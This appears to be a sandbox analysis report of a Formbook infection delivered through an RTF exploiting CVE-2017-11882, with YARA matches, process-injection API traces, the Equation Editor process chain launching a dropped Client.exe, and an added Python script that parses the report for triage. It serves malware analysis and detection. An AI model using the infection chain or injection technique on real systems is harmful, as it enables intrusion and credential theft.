          Source: Process Memory Space: NAPSTAT.EXE PID: 204, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp, type: DROPPED Matched rule: rtf_cve2017_11882_ole author = John Davison, description = Attempts to identify the exploit CVE 2017 11882, score = , sample = 51cf2a6c0c1a29abca9fd13cb22421da, reference = https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp, type: DROPPED Matched rule: EXP_potential_CVE_2017_11882 author = ReversingLabs, reference = https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-cobalt-strike-payload-exploiting-cve-2017-11882.html
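The match list above is a flattened table: each line carries a source (an unpacked PE, a memory dump named after its process index, base address and page protection, a whole process memory space, or a dropped file), the scan type, the rule name and the rule's metadata, and the cell boundary between the type and "Matched rule:" is often lost. The script below, added here as an example and not part of the Joe Sandbox report, parses those lines, plus the "Code function: N_S_ADDR" lines that follow, into records and summarises which processes carry Formbook-matched memory and which dropped file tripped the CVE-2017-11882 rules. The field layout it assumes for .sdmp names (process index, stage, dump id, base address, page protection) and the decimal/hex conventions for process indices are assumptions, not something the report states; only a subset of the report's lines is embedded, with most rule metadata trimmed.

```python
"""Parse the flattened YARA-match and "Code function" lines of a Joe Sandbox
report and summarise where the Formbook payload was found.

Added example for this page, not Joe Sandbox code.  Assumptions the report
does not state: an .sdmp name is
<process index>.<stage>.<dump id>.<base address>.<page protection>.<...>.sdmp
with 0x40 = PAGE_EXECUTE_READWRITE and 0x04 = PAGE_READWRITE, and the leading
number of "N.S.image.base.K.unpack" sources and of "N_S_ADDR" code-function
ids is that same process index (decimal there, hex in the .sdmp name).
"""
import re
from collections import defaultdict

# Subset of the report's lines, copied from the page with metadata trimmed;
# note the fused "UNPACKEDPEMatched rule:" cell boundary the parser tolerates.
REPORT_LINES = [
    "Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, scan_context = file, memory, license = Elastic License v2",
    "Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan",
    "Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows",
    "Source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, cape_type = Formbook Payload",
    "Source: Process Memory Space: NAPSTAT.EXE PID: 204, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows",
    "Source: C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp, type: DROPPEDMatched rule: rtf_cve2017_11882_ole author = John Davison, description = Attempts to identify the exploit CVE 2017 11882, score = , sample = 51cf2a6c0c1a29abca9fd13cb22421da",
    "Source: C:\\Users\\user\\AppData\\Local\\Temp\\Client.exeCode function: 5_2_001F13B0",
    "Source: C:\\Windows\\SysWOW64\\notepad.exeCode function: 9_2_00401030",
]

MATCH_RE = re.compile(r"^Source: (?P<src>.+?), type: (?P<type>[A-Z]+?)\s*Matched rule: (?P<rule>\S+)\s*(?P<meta>.*)$")
FUNC_RE = re.compile(r"^Source: (?P<path>.+?)\s*Code function: (?P<pidx>\d+)_(?P<stage>\d+)_(?P<addr>[0-9A-Fa-f]+)$")
UNPACK_RE = re.compile(r"^(?P<pidx>\d+)\.(?P<stage>\d+)\.(?P<image>.+?)\.(?P<base>[0-9A-Fa-f]+)\.\d+(?:\.raw)?\.unpack$")
SDMP_RE = re.compile(r"^(?P<pidx>[0-9A-F]{8})\.(?P<stage>[0-9A-F]{8})\.\d+\.(?P<base>[0-9A-F]{16})\.(?P<prot>[0-9A-F]{8})\..*\.sdmp$")
MEMSTR_RE = re.compile(r"^Process Memory Space: (?P<image>.+?) PID: (?P<pid>\d+)$")
PAGE_EXECUTE_READWRITE, PAGE_READWRITE = 0x40, 0x04


def parse_meta(meta: str) -> dict:
    """Split 'k = v, k2 = v2' rule metadata.  A value that itself contains
    ', ' (scan_context = file, memory) is re-joined onto the previous key."""
    out, last = {}, None
    for tok in meta.split(", "):
        if " = " in tok:
            key, val = tok.split(" = ", 1)
            out[key.strip()] = val.strip()
            last = key.strip()
        elif last is not None:
            out[last] = f"{out[last]}, {tok}"
    return out


def parse_line(line: str):
    """One report line -> a 'yara' or 'func' record, or None if neither."""
    m = MATCH_RE.match(line)
    if m:
        rec = {"kind": "yara", "type": m["type"], "rule": m["rule"],
               "meta": parse_meta(m["meta"]), "source": m["src"], "pidx": None, "image": None}
        src = m["src"]
        if (u := UNPACK_RE.match(src)):
            rec.update(pidx=int(u["pidx"]), image=u["image"], base=int(u["base"], 16))
        elif (s := SDMP_RE.match(src)):
            rec.update(pidx=int(s["pidx"], 16), base=int(s["base"], 16), prot=int(s["prot"], 16))
        elif (p := MEMSTR_RE.match(src)):
            rec.update(image=p["image"], os_pid=int(p["pid"]))
        return rec
    f = FUNC_RE.match(line)
    if f:
        return {"kind": "func", "path": f["path"], "image": f["path"].rsplit("\\", 1)[-1],
                "pidx": int(f["pidx"]), "addr": int(f["addr"], 16)}
    return None


def triage(lines):
    """Group YARA hits per process (by image name where a code-function or
    unpack line lets us resolve the process index) and per dropped file."""
    recs = [r for r in map(parse_line, lines) if r]
    image_of = {r["pidx"]: r["image"] for r in recs if r.get("pidx") is not None and r.get("image")}
    by_rule = defaultdict(int)
    procs = defaultdict(lambda: {"matches": 0, "rules": set(), "rwx_regions": set(), "rw_regions": set()})
    dropped = defaultdict(list)
    for r in recs:
        if r["kind"] != "yara":
            continue
        by_rule[r["rule"]] += 1
        if r["type"] == "DROPPED":
            dropped[r["source"]].append(r["rule"])
            continue
        image = r.get("image") or image_of.get(r.get("pidx"))
        p = procs[image or f"process#{r['pidx']}"]
        p["matches"] += 1
        p["rules"].add(r["rule"])
        if r.get("prot") == PAGE_EXECUTE_READWRITE:
            p["rwx_regions"].add(r["base"])
        elif r.get("prot") == PAGE_READWRITE:
            p["rw_regions"].add(r["base"])
    return {"by_rule": dict(by_rule), "processes": dict(procs), "dropped": dict(dropped)}


def formbook_hosts(result):
    """Processes whose memory matched any Formbook rule; anything beyond the
    dropped Client.exe is a process the payload was injected into."""
    return sorted(name for name, p in result["processes"].items()
                  if any("formbook" in rule.lower() for rule in p["rules"]))


def exploit_drops(result):
    """Dropped files that tripped a CVE-2017-11882 (Equation Editor) rule."""
    return sorted(path for path, rules in result["dropped"].items()
                  if any("2017_11882" in rule.lower().replace("-", "_") for rule in rules))


if __name__ == "__main__":
    res = triage(REPORT_LINES)
    for name, p in res["processes"].items():
        print(f"{name:12s} matches={p['matches']} rwx={[hex(a) for a in p['rwx_regions']]} rw={[hex(a) for a in p['rw_regions']]}")
    print("Formbook hosts:", formbook_hosts(res))
    print("CVE-2017-11882 drops:", exploit_drops(res))
```

Run on the full report, the useful output is the host list: Formbook strings appear not only in the dropped Client.exe (in a PAGE_READWRITE region, the payload sitting in its own memory) but in notepad.exe and NAPSTAT.EXE, in executable-and-writable regions, which is what the "process hollowing" and "Injects a PE file into a foreign processes" signatures in the overview describe. The DROPPED hit on the ~WRF*.tmp file is the Equation Editor object Word extracted from the RTF, which is where the CVE-2017-11882 rules fire rather than on the RTF itself.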
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_001F13B0
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_001F3618
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_001F4AB9
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_001FA060
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_001F4AC8
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_003403E5
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_00B59CB0
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_00B59EF0
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_00B59AE0
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_00B5A4E8
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_00B56C10
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_00B59920
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_04C40048
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_04C40548
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_04C4050C
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00401030
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_0041E163
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_0041E166
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_0041F9AA
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_0041EA20
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_0040E330
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_0041EC09
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00409DD0
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_0041F584
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00402D8B
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00402D90
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_0041E7ED
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00402FB0
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B1E0C6
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B4D005
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B9D06D
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B3905A
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B23040
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B1E2E9
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00BC1238
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00BC63BF
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B463DB
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B1F3CF
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B22305
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B6A37B
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B27353
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B55485
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B31489
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00BA443E
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B5D47D
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B3C5F0
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00BA05E3
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B2351F
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B66540
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B24680
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B2E6C1
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B6A634
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00BC2622
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B2C7BC
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00BA579A
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B557C3
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00BBF8EE
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B9F8C4
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B4286D
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B2C85C
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B229B2
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00BC098E
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B369FE
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00BA5955
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00BA394B
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00BD3A83
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00BCCBA4
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00BADBDA
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00BA6BCB
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B47B00
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00BBFDDD
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B50D3B
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B2CD5B
          Source: C:\Windows\SysWOW64\notepad.exe Code function: String function: 00B6373B appears 217 times
          Source: C:\Windows\SysWOW64\notepad.exe Code function: String function: 00B63F92 appears 116 times
          Source: C:\Windows\SysWOW64\notepad.exe Code function: String function: 00B8F970 appears 80 times
          Source: C:\Windows\SysWOW64\notepad.exe Code function: String function: 00B1DF5C appears 111 times
          Source: C:\Windows\SysWOW64\notepad.exe Code function: String function: 00B1E2A8 appears 37 times
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_001F24A0 NtQuerySystemInformation,
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_001F2498 NtQuerySystemInformation,
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_00E9DC10 NtSetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_00E9D1F0 NtProtectVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_00E9CD08 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_00E9F100 NtResumeThread,
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_00E9D700 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_04C4B8D8 NtCreateThreadEx,
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_04C4B3F8 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_0041AD40 NtCreateFile,
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_0041ADF0 NtReadFile,
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_0041AE70 NtClose,
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_0041AF20 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_0041AD3A NtCreateFile,
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_0041AE6A NtClose,
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_0041AF1A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B100C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B10078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B10048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B107AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B0F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B0F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B0FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B0FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B0FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B0FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B0FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B0FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B0FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B0FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B0FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B0FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B0FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B110D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B10060 NtQuerySection,
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B101D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B1010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B11148 NtOpenThread,
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B0F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B11930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B0F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B0FAB8 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B0FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B0FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B0FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B0FB50 NtCreateKey,
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B0FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B10C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B0FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B11D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B0FD5C NtEnumerateKey,
          Source: ~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Section loaded: amsi.dll
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE Section loaded: mozglue.dll
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE Section loaded: winsqlite3.dll
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 77620000 page execute and read and write
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 77740000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Memory allocated: 77620000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Memory allocated: 77740000 page execute and read and write
          Source: C:\Windows\SysWOW64\notepad.exe Memory allocated: 77620000 page execute and read and write
          Source: C:\Windows\SysWOW64\notepad.exe Memory allocated: 77740000 page execute and read and write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE Memory allocated: 77620000 page execute and read and write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE Memory allocated: 77740000 page execute and read and write
          Source: Client.exe.0.dr Static PE information: Section: bdzG4e ZLIB complexity 1.0003269937782806
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtf ReversingLabs: Detection: 14%
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
          Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C %tmp%\Client.exe A C
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\Client.exe C:\Users\user\AppData\Local\Temp\Client.exe A C
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Process created: C:\Windows\SysWOW64\notepad.exe C:\Windows\SysWOW64\notepad.exe /Processid:{9A42BBC4-4F4B-4518-841E-56E3DAA7341B}
          Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe C:\Program Files (x86)\Mozilla Firefox\Firefox.exe
          Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtf
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$curiteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtf
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVR582D.tmp
          Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winRTF@11/9@4/2
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: explorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: .VBPud<_
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE File read: C:\Windows\System32\drivers\etc\hosts
          Source: Window Recorder Window detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtf Static file information: File size 2883613 > 1048576
          Source: Binary string: notepad.pdb source: NAPSTAT.EXE, 0000000B.00000002.1177850032.0000000000433000.00000004.00000020.00020000.00000000.sdmp, NAPSTAT.EXE, 0000000B.00000002.1180581876.0000000002303000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000D.00000000.1154674128.0000000000593000.00000004.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: notepad.exe, notepad.exe, 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1042200687.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000003.945235876.00000000001F0000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000003.946852409.0000000000970000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: notepad.pdbx source: NAPSTAT.EXE, 0000000B.00000002.1177850032.0000000000433000.00000004.00000020.00020000.00000000.sdmp, NAPSTAT.EXE, 0000000B.00000002.1180581876.0000000002303000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000D.00000000.1154674128.0000000000593000.00000004.80000000.00040000.00000000.sdmp
          Source: Binary string: napstat.pdb source: notepad.exe, 00000009.00000003.1038035602.000000000088C000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1039905006.00000000002E0000.00000040.10000000.00040000.00000000.sdmp
          Source: ~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp.0.dr Initial sample: OLE indicators vbamacros = False
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_01185096 push 00000020h; iretd
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_01189ABE push ebx; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_011828DB pushfd ; retf
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_011854E3 push 00000020h; iretd
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_001FA050 push eax; retf 001Eh
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_001F907A push esp; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_001F9092 pushfd ; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_001FAA30 push eax; iretd
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_001FAA50 pushad ; iretd
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_001F8EDD push eax; retn 001Eh
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_001F8ED8 push eax; retn 001Eh
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_04C43EA9 push 03682C01h; ret
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_04C4381A push 800FD82Bh; retf 006Dh
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_04C4301A push 800FD82Bh; retf 0075h
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_04C4371A push 800FD82Bh; retf 006Eh
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_04C632BC push 800FD82Bh; retf
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_04C642B8 push 800FD82Bh; iretd
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_04C647BD push 800FD82Bh; retf 005Fh
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_04C63DBB push 800FF02Bh; retf 0069h
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_04C64FB8 push 800FC303h; iretd
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_04C61B75 push 800FC303h; retn 0002h
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_04E4585D push 800FD82Bh; retf
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_0041E075 push eax; ret
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_0040880F push ebx; iretd
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_0041E0C2 push eax; ret
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_004140CB push 00000011h; retf
